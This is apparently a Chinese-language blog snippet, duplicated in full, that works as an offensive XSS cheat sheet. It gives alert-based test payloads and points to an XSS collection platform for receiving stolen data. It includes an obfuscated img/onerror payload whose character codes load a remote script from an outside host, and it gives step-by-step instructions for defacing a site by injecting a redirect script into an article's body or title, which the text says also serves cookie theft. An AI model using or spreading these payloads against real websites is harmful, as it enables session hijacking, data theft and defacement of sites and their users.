基础检测,出现弹框:
<img src=1 οnerrοr=alert(1)> (显示1)
<script>alert("xss")</script> (显示xss)
alert(document.cookie) (显示cookie))
Cookie类型XSS
1.Xss 安全测试字符转换工具
工具猫
http://tool.dn8.net/# XSS测试平台 用于生成,接收XSS代码获得的数据
2.
<img/src=1 οnerrοr=(function(){window.s=document.createElement(String.fromCharCode(115,99,114,105,112,116));window.s.src=String.fromCharCode(104,116,116,112,58,47,47,120,46,100,110,56,46,110,101,116,47,120,115,115,46,112,104,112,47,97,100,100,46,104,116,109,108,63,112,105,100,61,54,52,38,104,97,115,104,61,97,97,98,100,51,99,56,51);document.body.appendChild(window.s)})()>
后台XSS挂黑页:
你需要的代码:<script>window.location="(你的黑页地址)";</script>
创建一个新的文章,假如你只是想在网站上挂黑页,你就把上面的代码粘贴到文章内容里
假如你想直接把主页黑掉,那么你就把它复制到标题里
这个办法也能用来盗取Cookie,跳转网页,等等
<img src=1 οnerrοr=alert(1)> (显示1)
<script>alert("xss")</script> (显示xss)
alert(document.cookie) (显示cookie))
Cookie类型XSS
1.Xss 安全测试字符转换工具
工具猫
http://tool.dn8.net/# XSS测试平台 用于生成,接收XSS代码获得的数据
2.
<img/src=1 οnerrοr=(function(){window.s=document.createElement(String.fromCharCode(115,99,114,105,112,116));window.s.src=String.fromCharCode(104,116,116,112,58,47,47,120,46,100,110,56,46,110,101,116,47,120,115,115,46,112,104,112,47,97,100,100,46,104,116,109,108,63,112,105,100,61,54,52,38,104,97,115,104,61,97,97,98,100,51,99,56,51);document.body.appendChild(window.s)})()>
后台XSS挂黑页:
你需要的代码:<script>window.location="(你的黑页地址)";</script>
创建一个新的文章,假如你只是想在网站上挂黑页,你就把上面的代码粘贴到文章内容里
假如你想直接把主页黑掉,那么你就把它复制到标题里
这个办法也能用来盗取Cookie,跳转网页,等等
扫一扫
3458
被折叠的 条评论
为什么被折叠?
到【灌水乐园】发言
